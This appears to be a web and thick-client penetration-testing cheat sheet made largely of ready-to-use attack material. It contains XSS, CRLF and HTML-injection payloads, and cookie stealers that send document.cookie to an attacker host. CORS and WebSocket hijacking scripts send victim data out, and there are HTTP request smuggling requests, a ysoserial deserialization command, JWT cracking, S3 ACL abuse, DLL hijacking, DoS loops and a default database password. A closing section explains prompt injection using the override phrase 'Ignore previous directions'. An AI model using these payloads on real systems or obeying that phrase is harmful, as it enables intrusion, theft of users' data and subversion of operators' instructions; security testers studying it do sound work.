• Shortest rXSS possible
• If Privileges are required, see if you can chain the XSS with a CSRF

Carriage Return Line Feed (CRLF) injection

• /%0D%0AX-XSS-Protection%3A%200%0A%0A%3cscript%3ealert(document.domain)%3c%2fscript%3e%3c!--
• /%E5%98%8D%E5%98%8AX-XSS-Protection%3A%200%E5%98%8D%E5%98%8A%E5%98%8D%E5%98%8A%3cscript%3ealert(document.domain)%3c%2fscript%3e%3c!--
• Nuclei template %USERPROFILE%\nuclei-templates\vulnerabilities\generic\crlf-injection.yaml

Cross Site Tracing

• If cookies are protected by the HttpOnly flag but the TRACE method is enabled, a technique called Cross Site Tracing can be used. [Reference]

Payloads

• HTML injection

  <p style="color:red">ERROR! Repeat the login</p>Membership No.<br/><input><br/><a href=http://evil.com><br><input type=button value="Login"></a><br/><img src=http://evil.com style="visibility:hidden">

• For hidden inputs: accesskey="X" onclick="alert(1)" then Press ALT+SHIFT+X on Windows / CTRL+ALT+X on OS X
• For mobile applications: try to use as a vector the name of the phone with a payload like "/><script>alert(1)</script>
• iframe + base64 encoded SVG

  <iframe src="data:image/svg+xml;base64,PD94bWwgdmVyc2lvbj0iMS4wIiBzdGFuZGFsb25lPSJubyI/Pgo8IURPQ1RZUEUgc3ZnIFBVQkxJQyAiLS8vVzNDLy9EVEQgU1ZHIDEuMS8vRU4iICJodHRwOi8vd3d3LnczLm9yZy9HcmFwaGljcy9TVkcvMS4xL0RURC9zdmcxMS5kdGQiPgoKPHN2ZyB2ZXJzaW9uPSIxLjEiIGJhc2VQcm9maWxlPSJmdWxsIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciPgogICA8cmVjdCB3aWR0aD0iMzAwIiBoZWlnaHQ9IjEwMCIgc3R5bGU9ImZpbGw6cmdiKDAsMCwyNTUpO3N0cm9rZS13aWR0aDozO3N0cm9rZTpyZ2IoMCwwLDApIiAvPgogICA8c2NyaXB0IHR5cGU9InRleHQvamF2YXNjcmlwdCI+CiAgICAgIGFsZXJ0KGRvY3VtZW50LmRvbWFpbik7CiAgIDwvc2NyaXB0Pgo8L3N2Zz4="></iframe>

• Cookie stealers

  • fetch('https://ATTACKER-WEBSITE', {method: 'POST',mode: 'no-cors',body:document.cookie});

  • document.write('<img src=\"http://ATTACKER-WEBSITE/?cookie=' + document.cookie + '\" />')

  • <img src=x onerror=this.src='http://ATTACKER-WEBSITE/?x='+document.cookie;>

• %22%20onbeforeinput=alert(document.domain)%20contenteditable%20alt=%22

• 1672&81782%26apos%3b%3balert(%26apos%3bXSS%26apos%3b)%2f%2f232=1

• <svg/onload=alert(0)>

• Unusual events
  • onpointerrawupdate (Chrome only)
  • onmouseleave
• This lead the page to make a loop of requests, eventually causing being blocked by a WAF and being a potential DoS

  for(;;){fetch('https://VICTIM/',{method:'GET'});}

• Double encoding

  %253c%252fscript%253e%253cscript%253ealert(document.cookie)%253c%252fscript%253e

• Small SVG base64

  data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciPjxyZWN0IHdpZHRoPSIxIiBoZWlnaHQ9IjEiLz48c2NyaXB0PmFsZXJ0KDEpPC9zY3JpcHQ+PC9zdmc+

• jAvAsCrIpT

  <a href="jAvAsCrIpT:alert(1)">payload</a>

• Remove the entire token
• Use any random but same-length token, or same-length+1/same-length-1
• Use another user's token
• Change from POST to GET and delete the token
• If it's a PUT or DELETE request, try POST /profile/update?_method=PUT or

  POST /profile/update HTTP/1.1
  Host: vuln.com
  ...
  
  _method=PUT

• If the token it's in a custom header, delete the header
• Change the Content-Type to application/json, application/x-url-encoded or form-multipart, text/html, application/xml
• If there is double submit token, try CRLF injection
• Bypassing referrer check
  • If it's checked but only when it exists, add to the PoC <meta name="referrer" content="never">
  • Regex Referral bypass

    - https://attacker.com?victim.com
    - https://attacker.com;victim.com
    - https://attacker.com/victim.com/../victimPATH
    - https://victim.com.attacker.com
    - https://attackervictim.com
    - https://[email protected]
    - https://attacker.com#victim.com
    - https://attacker.com\.victim.com
    - https://attacker.com/.victim.com
    

• CSRF token stealing via XSS/HTMLi/CORS
• JSON based
  • Change the Content-Type to text/plain, application/x-www-form-urlencoded, multipart/form-data
  • Use flash + 307 redirect
• Guessable CSRF token
• Clickjacking to strong CSRF token bypass
• Type juggling
• Use array, from csrf=token to csrf[]=token
• Set the CSRF token to null or add null bytes
• Check whether CSRF token is sent over http or sent to 3rd party
• Generate multiple CSRF tokens, pick the static part. Play with the dynamic part

Resources

• CSRF PoC Generator

Classic CORS vulnerability

<script>
  var req = new XMLHttpRequest();
  req.onload = reqListener;
  req.open('get','$url/accountDetails',true);
  req.withCredentials = true;
  req.send();
  function reqListener() {
  location='/log?key='+this.responseText;
  };
</script>

CORS vulnerability with null origin

<iframe sandbox="allow-scripts allow-top-navigation allow-forms" src="data:text/html,<script>
  var req = new XMLHttpRequest();
  req.onload = reqListener;
  req.open('get','vulnerable-website.com/sensitive-victim-data',true);
  req.withCredentials = true;
  req.send();
     
  function reqListener() {
  location='malicious-website.com/log?key='+this.responseText;
  };</script>">
</iframe>

CORS vulnerability with trusted insecure protocols

<script>
  document.location="http://stock.$your-lab-url/?productId=4<script>var req = new XMLHttpRequest(); req.onload = reqListener; req.open('get','https://$your-lab-url/accountDetails',true); req.withCredentials = true;req.send();function reqListener() {location='https://$exploit-server-url/log?key='%2bthis.responseText; };%3c/script>&storeId=1"
</script>

Tools

• Corsy Corsy is a lightweight program that scans for all known misconfigurations in CORS implementations

Classic PoC

<style>
  iframe {
    position:relative;
    width:$width_value;
    height: $height_value;
    opacity: $opacity;
    z-index: 2;
  }
  div {
    position:absolute;
    top:$top_value;
    left:$side_value;
    z-index: 1;
  }
</style>
<div>Click me button</div>
<iframe src="$url"></iframe>

Classic PoC + XSS

<style>
  iframe {
    position:relative;
    width:$width_value;
    height: $height_value;
    opacity: $opacity;
    z-index: 2;
  }
  div {
    position:absolute;
    top:$top_value;
    left:$side_value;
    z-index: 1;
  }
</style>
<div>Click me</div>
<iframe src="$url?name=<img src=1 onerror=alert(document.domain)>&[email protected]&subject=test&message=test#feedbackResult"></iframe>

Many DOM-based vulnerabilities can be traced back to problems with the way client-side code manipulates attacker-controllable data.

• document.URL
• document.documentURI
• document.URLUnencoded
• document.baseURI
• location
• document.cookie
• document.referrer
• window.name
• history.pushState
• history.replaceState
• localStorage
• sessionStorage
• IndexedDB (mozIndexedDB, webkitIndexedDB, msIndexedDB)
• Database

Any web security vulnerability might arise in relation to WebSockets:

• User-supplied input transmitted to the server might be processed in unsafe ways, leading to vulnerabilities such as SQL injection or XML external entity injection;
• Some blind vulnerabilities reached via WebSockets might only be detectable using out-of-band (OAST) techniques;
• If attacker-controlled data is transmitted via WebSockets to other application users, then it might lead to XSS or other client-side vulnerabilities.

Cross-site WebSocket hijacking (CSRF missing)

<script>
  websocket = new WebSocket('wss://websocket-URL');
  websocket.onopen = start;
  websocket.onmessage = handleReply;
  function start(event) {
    websocket.send("READY");
  }
  function handleReply(event) {
    fetch('https://your-domain/?'+event.data, {mode: 'no-cors'});
  }
</script>

How to spot Insecure deserialization

• PHP example O:4:"User":2:{s:4:"name":s:6:"carlos"; s:10:"isLoggedIn":b:1;}
• Java objects always begin with the same bytes
  • Hex ac ed
  • Base64 rO0

Ysoserial

Because of Runtime.exec(), ysoserial doesn't work well with multiple commands. After some research, I found a way to run multiple sys commands anyway, by using sh -c $@|sh . echo before the multiple commands that we need to run. Here I needed to run the command host and whoami:

java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections7 'sh -c $@|sh . echo host $(whoami).<MY-'RATOR-ID>.burpcollaborator.net' | gzip | base64

PHPGGC is a library of unserialize() payloads along with a tool to generate them, from command line or programmatically.

Burp extensions

• Java Deserialization Scanner
• Java Serialized Payloads
• GadgetProbe
• Freddy, Deserialization Bug Finder
• PHP Object Injection Check

• Try fuzzing the template by injecting a sequence of special characters commonly used in template expressions, such as ${{<%[%'"}}%\. To identify the template engine submit invalid syntax to cause an error message.
• The next step is look for the documentation to see how you can exploit the vulnerable endpoints and known vulnerabilities/exploits.
• Use payloads like these

  {{7*7}}[[3*3]]
  {{7*7}}
  {{7*'7'}}
  <%= 7 * 7 %>
  ${7*7}
  ${{7*7}}
  @(7+7)
  #{7*7}
  #{ 7 * 7 }
  

Constructing a web cache poisoning attack

1. Identify and evaluate unkeyed inputs
2. Elicit a harmful response from the back-end server
3. Get the response cached

Cache key flaws Many websites and CDNs perform various transformations on keyed components when they are saved in the cache key:

• Excluding the query string
• Filtering out specific query parameters
• Normalizing input in keyed components

Cache probing methodology

1. Identify a suitable cache oracle
   • Simply a page or endpoint that provides feedback about the cache's behavior. This feedback could take various forms, such as: An HTTP header that explicitly tells you whether you got a cache hit, Observable changes to dynamic content, Distinct response times
2. Probe key handling
   • Is anything being excluded from a keyed component when it is added to the cache key? Common examples are excluding specific query parameters, or even the entire query string, and removing the port from the Host header.
3. Identify an exploitable gadget
   • These techniques enable you to exploit a number of unclassified vulnerabilities that are often dismissed as "unexploitable" and left unpatched.

• "If someone sends a cookie called '0', automattic.com responds with a list of all 152 cookies supported by the application: curl -v -H 'Cookie: 0=1' https://automattic.com/?cb=123 | fgrep Cookie" [Reference];
• Carriage Return Line Feed (CRLF) injection: "When you find response header injection, you can probably do better than mere XSS or open-redir. Try injecting a short Content-Length header to cause a reverse desync and exploit random live users." [Reference]

Most HTTP request smuggling vulnerabilities arise because the HTTP specification provides two different ways to specify where a request ends:

• Content-Length

  POST /search HTTP/1.1
  Host: normal-website.com
  Content-Type: application/x-www-form-urlencoded
  Content-Length: 11
  q=smuggling

• Transfer-Encoding

  POST /search HTTP/1.1
  Host: normal-website.com
  Content-Type: application/x-www-form-urlencoded
  Transfer-Encoding: chunked
  b
  q=smuggling
  0

Example

POST / HTTP/1.1
Host: smuggle-vulnerable.net
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 6
Transfer-Encoding: chunked

0

G

Result: GPOST request

• Some servers do not support the Transfer-Encoding header in requests;
• Some servers that do support the Transfer-Encoding header can be induced not to process it if the header is obfuscated in some way.

Ways to obfuscate the Transfer-Encoding header

• Transfer-Encoding: xchunked
• Transfer-Encoding : chunked
• Transfer-Encoding: chunked
• Transfer-Encoding: x
• Transfer-Encoding:[tab]chunked
• [space]Transfer-Encoding: chunked
• X: X[\n]Transfer-Encoding: chunked

• Transfer-Encoding
  : chunked
  

Confirming CL.TE vulnerabilities using differential responses

POST /search HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 49
Transfer-Encoding: chunked

e
q=smuggling&x=
0

GET /404 HTTP/1.1
Foo: x

Result

GET /404 HTTP/1.1
Foo: xPOST /search HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 11

q=smuggling

Impact

• Bypass front-end security controls
• Revealing front-end request rewriting
• Capturing other users' requests
• Using HTTP request smuggling to exploit reflected XSS
• Turn an on-site redirect into an open redirect
  Example of 301 in Apache and IIS web servers

  GET /home HTTP/1.1
  Host: normal-website.com
  HTTP/1.1 301 Moved Permanently
  Location: https://normal-website.com/home/

  Vulnerable request

  POST / HTTP/1.1
  Host: vulnerable-website.com
  Content-Length: 54
  Transfer-Encoding: chunked
  
  0
  
  GET /home HTTP/1.1
  Host: attacker-website.com
  Foo: X

  Result

  GET /home HTTP/1.1
  Host: attacker-website.com
  Foo: XGET /scripts/include.js HTTP/1.1
  Host: vulnerable-website.com
  HTTP/1.1 301 Moved Permanently
  Location: https://attacker-website.com/home/

• Perform web cache poisoning
• Perform web cache deception

Resource

• HTTP Request Smuggler

A JWT consists of a header, a payload, and a signature. Each part is separated by a dot.

Common attacks

• Accepting tokens with no signature
• Brute-forcing secret keys using hashcat
  • You need a valid JWT and a wordlist
  • hashcat -a 0 -m 16500 <jwt> <wordlist>
  • If any of the signatures match, hashcat will give you an output like this <jwt>:<identified-secret> along with other details
  • Once identified the secret key, you can use it to generate a valid signature for any JWT header and payload that you like. See Signing JWTs
• Injecting self-signed JWTs via the jwk, jku or kid parameter
• Change Content-Type in cty to achieve XXE and deserialization attacks
• x5c (X.509 Certificate Chain) can lead to CVE-2017-2800 and CVE-2018-2633
• JWT algorithm confusion

Resources

• {JWT}.{Attack}.Playbook
  • Checklist
• JWT Editor

How OAuth 2.0 works:

• Client application The website or web application that wants to access the user's data;
• Resource owner The user whose data the client application wants to access;
• OAuth service provider The website or application that controls the user's data and access to it. They support OAuth by providing an API for interacting with both an authorization server and a resource server.

OAuth flow

Following standard endpoints:

• /.well-known/oauth-authorization-server
• /.well-known/openid-configuration

Vulnerabilities in the client application

• Improper implementation of the implicit grant type
• Flawed CSRF protection

Vulnerabilities in the OAuth service

• Leaking authorization codes and access tokens
• Flawed scope validation
• Unverified user registration

Target example: http://[name_of_bucket].s3.amazonaws.com

Read Permission

• aws s3 ls s3://[name_of_bucket] --no-sign-request
• aws s3 ls s3://pyx-pkgs --recursive --human-readable --summarize

Write Permission

• aws s3 cp localfile s3://[name_of_bucket]/test_file.txt –-no-sign-request

READ_ACP

• aws s3api get-bucket-acl --bucket [bucketname] --no-sign
• aws s3api get-object-acl --bucket [bucketname] --key index.html --no-sign-request

WRITE_ACP

• aws s3api put-bucket-acl --bucket [bucketname] [ACLPERMISSIONS] --no-sign-request
• aws s3api put-object-acl --bucket [bucketname] --key file.txt [ACLPERMISSIONS] --no-sign-request

Tools

• Anonymous Cloud
• AWS CLI
• S3Scanner A tool to find open S3 buckets and dump their contents
• Cloud - AWS Pentest
• s3enum
• To find secrets, you can use trufflehog.

Resources

• https://blog.yeswehack.com/yeswerhackers/abusing-s3-bucket-permissions/
• https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_policies_examples_s3_rw-bucket.html

Tools

• Anonymous Cloud
• https://github.com/RhinoSecurityLabs/GCPBucketBrute

Resources

• https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/
• https://rhinosecuritylabs.com/cloud-security/privilege-escalation-google-cloud-platform-part-2/

To analyze the schema: vangoncharov.github.io/graphql-voyager/ or InQL for Burp Suite.

GraphQL Introspection query

{"query": "{__schema{queryType{name}mutationType{name}subscriptionType{name}types{...FullType}directives{name description locations args{...InputValue}}}}fragment FullType on __Type{kind name description fields(includeDeprecated:true){name description args{...InputValue}type{...TypeRef}isDeprecated deprecationReason}inputFields{...InputValue}interfaces{...TypeRef}enumValues(includeDeprecated:true){name description isDeprecated deprecationReason}possibleTypes{...TypeRef}}fragment InputValue on __InputValue{name description type{...TypeRef}defaultValue}fragment TypeRef on __Type{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name}}}}}}}}"}

{query: __schema{queryType{name}mutationType{name}subscriptionType{name}types{...FullType}directives{name description locations args{...InputValue}}}}fragment FullType on __Type{kind name description fields(includeDeprecated:true){name description args{...InputValue}type{...TypeRef}isDeprecated deprecationReason}inputFields{...InputValue}interfaces{...TypeRef}enumValues(includeDeprecated:true){name description isDeprecated deprecationReason}possibleTypes{...TypeRef}}fragment InputValue on __InputValue{name description type{...TypeRef}defaultValue}fragment TypeRef on __Type{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name}}}}}}}}

{"operationName":"IntrospectionQuery","variables":{},"query":"query IntrospectionQuery {\n  __schema {\n    queryType {\n      name\n    }\n    mutationType {\n      name\n    }\n    subscriptionType {\n      name\n    }\n    types {\n      ...FullType\n    }\n    directives {\n      name\n      description\n      locations\n      args {\n        ...InputValue\n      }\n    }\n  }\n}\n\nfragment FullType on __Type {\n  kind\n  name\n  description\n  fields(includeDeprecated: true) {\n    name\n    description\n    args {\n      ...InputValue\n    }\n    type {\n      ...TypeRef\n    }\n    isDeprecated\n    deprecationReason\n  }\n  inputFields {\n    ...InputValue\n  }\n  interfaces {\n    ...TypeRef\n  }\n  enumValues(includeDeprecated: true) {\n    name\n    description\n    isDeprecated\n    deprecationReason\n  }\n  possibleTypes {\n    ...TypeRef\n  }\n}\n\nfragment InputValue on __InputValue {\n  name\n  description\n  type {\n    ...TypeRef\n  }\n  defaultValue\n}\n\nfragment TypeRef on __Type {\n  kind\n  name\n  ofType {\n    kind\n    name\n    ofType {\n      kind\n      name\n      ofType {\n        kind\n        name\n        ofType {\n          kind\n          name\n          ofType {\n            kind\n            name\n            ofType {\n              kind\n              name\n              ofType {\n                kind\n                name\n              }\n            }\n          }\n        }\n      }\n    }\n  }\n}\n"}

• Information Disclosure [high]: /_wpeprivate/config.json
• Data exposure:
  • /wp-json/wp/v2/users/
  • /wp-json/th/v1/user_generation
  • /?rest_route=/wp/v2/users
• xmlrpc.php enabled, reference. Send a post request to this endpoint with a body like this:

  <?xml version="1.0" encoding="utf-8"?>
  <methodCall>
  <methodName>system.listMethods</methodName>
  <params></params>
  </methodCall>

• Use Nuclei to detect WordPress websites from a list of targets with: nuclei -l subdomains.txt -t %USERPROFILE%/nuclei-templates/technologies/wordpress-detect.yaml
• Scan with WPScan github.com/wpscanteam/wpscan with: wpscan --url <domain> --api-token <your-api-token>
• Nuclei templates %USERPROFILE%\nuclei-templates\vulnerabilities\wordpress\advanced-access-manager-lfi.yaml

Resources

• https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/WordPress.md
• https://www.rcesecurity.com/2022/07/WordPress-Transposh-Exploiting-a-Blind-SQL-Injection-via-XSS/
• WordPress Checklist

• Check if trace.axd is enabled
• Search for

  Views/web.config
  bin/WebApplication1.dll
  System.Web.Mvc.dll
  System.Web.Mvc.Ajax.dll
  System.Web.Mvc.Html.dll
  System.Web.Optimization.dll
  System.Web.Routing.dll
  

• Other common files

Resources

• https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/iis-internet-information-services
• Wordlist iisfinal.txt

• Find Lotus Domino with nuclei: %USERPROFILE%\nuclei-templates\technologies\lotus-domino-version.yaml
• Exploit DB: Lotus-Domino
• Fuzzing list: SecLists/LotusNotes.fuzz.txt

Once you have the source code, look for the secrets within the files. To find secrets, you can use trufflehog.

Other tools

• DotGit find if a website has .git exposed
• nuclei template %USERPROFILE%\nuclei-templates\exposures\configs\git-config.yaml
• GitDumper from GitTools

Tools

• Can I take over XYZ?
• nuclei template %USERPROFILE%\nuclei-templates\takeovers

• byp4xx, s/o to m0pam for the tip
• Search for subdomain with subfinder. Httpx filters subdomains with a 403 response and prints their cname. Test the cname for a bypass subfinder -d atg.se — silent | httpx -sc -mc 403 -cname, s/o to drak3hft7 for the tip
• 403 Bypasser Burp extension, test 403 bypasses on the run
• Replace HTTP/n with HTTP/1.1, HTTP/2 or HTTP/3
• Change the request from GET to POST or viceversa

• If the application gives the possibility to download data, try to download too much data
  • If there are restrictions, try to bypass
• In file uploads, try to upload huge files
• In chat section, try to send big messages and see how the application behaves
• Regular expression Denial of Service - ReDoS
  • search for RegExp()
• Long Password DoS Attack (Note: the value of password is hashed and then stored in Databases)
  • Check for length restriction and play with it
  • If there is no restriction, test until the application slows down
  • password.txt
• Long string DoS
• DoS against a victim
  • Sending a reset link might disable an user's account, spam to prevent the user from accessing their account
  • Multiple wrong passwords might disable an user's account

Tool

• Process Monitor to see which DLLs are missing for an exe and do DLL Hijacking

Using Process Monitor, add these the filters to find missing dlls.

After that, insert the dll in the position of the missing ones with the same name. An example of a dll:

#include <windows.h>

BOOL WINAPI DllMain(HANDLE hDll, DWORD dwReason, LPVOID lpReserved) {
    switch (dwReason)
    {
    case DLL_PROCESS_ATTACH:
        MessageBox(NULL,
            "success!!",
            "pwned",
            MB_ICONERROR | MB_OK
        );
        break;
    }

    return TRUE;
}

Resources

• hijacklibs.net
• Save the Environment (Variable)
• Spartacus DLL Hijacking

The application design is based on a two-tier architecture. In particular, the thick client application installed on the workstation communicates directly with a backend DBMS without the use of an application server.

The best option, from a security perspective, is designing and implementing a three-tier architecture in which the thick client connects with an intermediary layer (an application server), which in turn communicates with the database. A secure channel must be used for all communications, with only secure protocols (such TLS, HTTPS, etc.), and preferebli with Certificate Pinning.

If this is not possible, it is desirable to provide read-only users and read/write users distinct privileges at the DBMS layer. This would stop vertical privilege escalation even if a read-only user were to access the database directly and try to edit the data.

Sensitive data exposure, key leakage, broken authentication, insecure sessions, and spoofing attacks can all be caused by improper application of encryption methods. Some hashing or encryption techniques, such MD5 and RC4, are known to be insecure and are not advised for use.

When dealing with hashing algorithms, the strongest algorithm available should be used (e.g., SHA-512 or at least SHA-256). However, it is always crucial to take into account the precise context in which the hashing algorithm must be used. For instance, it is recommended to utilize contemporary hashing algorithms that have been created especially for securely saving passwords when managing passwords. This indicates that they should be slow (as opposed to fast algorithms like MD5 and SHA-1), and that can be configured by changing the work factor (e.g., PBKDF2 or Bcrypt)

If not configured correctly, the encryption can be not sufficiently secure. An example with AES, an algorithm for symmetric encryption:

• Cipher-Block-Chaining (CBC) is no longer considered safe when verifiable padding has been applied without first ensuring the integrity of the ciphertext, except for very specific circumstances. If implemented, it can weakens AES encryption.

The memory analysis of an application, done when the thick client process is running, can highlight the presence of secrets in cleartext and that can be therefore extracted by any user having access to the machine where the application is hosted.

Resource

• Process Hacker It helps to dump the exe memory and see what sensitive data is there

Sometimes, the thick client application's source code is not obfuscated, therefore a hostile user may decompile it and easily comprehend every functionality of the application. It's also possible that more can be found, like credentials and api keys.

Resources

• VB Decompiler decompile a VB application
• ILSpy | dnSpy .NET decompilers

If an application executable, and/or the imported DLLs, has not been digitally signed, it's possible replace it with a tampered version without the user noticing.

Resource

• Sigcheck check the signature of an executable

Due to the fact that the client does not verify the TLS certificate presented by the back-end, it's possible to intercept also HTTPS communications managed by the thick client application.

Without effective certificate control, an attacker who is capable of conducting a Man in the Middle attack can provide a self-signed certificate and the application will accept it, invalidating the protection provided by the TLS connection.

During the SSL/TLS negotiation, SSL/TLS connections may be set up to offer outdated protocols and cipher suites that are susceptible to known security flaws. The data transmitted between the server and the client could potentially be read or modified in this case if an attacker is able to intercept the communication.

Resource

• testssl.sh useful for checking outdated ciphers & more

If Citrix is present and you have access to it, there are multiple ways you can achieve Remote Code Execution:

• Try to upload a PowerShell
• Search for a functionality that opens a dialog box. Insert the path for cmd and PowerShell and see if they pop-up
• In a dialog box, see if the right-click is allowed. Play with the functionality to achieve RCE, like creating a .bat and running it or upload files
• Upload Process Hacker and see if you find Cleartext secrets in memory

Resources

• PowerShell
• Two RCEs are better than one: write-up of an interesting lateral movement

• If it's found that standard users have direct access to the database, there is the possibility for users to read and write data that is not otherwise accessible through the client application.
• If the SQL server requires a Windows User access, use the command runas /user:localadmin <SQL-SERVER-MANAGEMENT-STUDIO>
• Try access with the account sa:RPSsql12345
• Intercept the requests and see if there is an Insecure application design. In that case, it might be possible to perform a Direct database access, SQLi or Remote Code Execution

Resources

• Echo Mirage
• Wireshark

Windows service executable might be configured with insecure permissions. Services configured to use an executable with weak permissions are vulnerable to privilege escalation attacks.

Unprivileged users have the ability to change or replace the executable with arbitrary code, which would then be run the following time the service is launched. This can lead to privilege escalation depending on the user the service is running as.

• Check for classic HTML injections and XSS
  • Try to use a SSID as a vector for an XSS with a payload like "/><img src=x onerror=alert(1)>
• Check if <webview> works. If it does, it's might be possible to achieve a LFI with a payload like this <webview src="file:///etc/passwd"></webview>. [Reference]

Resources

• persistence-info.github.io
• PayloadsAllTheThings/Windows - Persistence

Prompt Injection is when an AI that follows textual instructions (a "prompt") to complete a job gets deceived by hostile, adversarial human input to do a task that was not its original goal. To test it, inject the text Ignore previous directions.

Some examples:

• "Exploiting GPT-3 prompts with malicious inputs that order the model to ignore its previous directions"
• "OpenAI’s ChatGPT is susceptible to prompt injection — say the magic words, “Ignore previous directions”, and it will happily divulge to you OpenAI’s proprietary prompt"
• Exploring Prompt Injection Attacks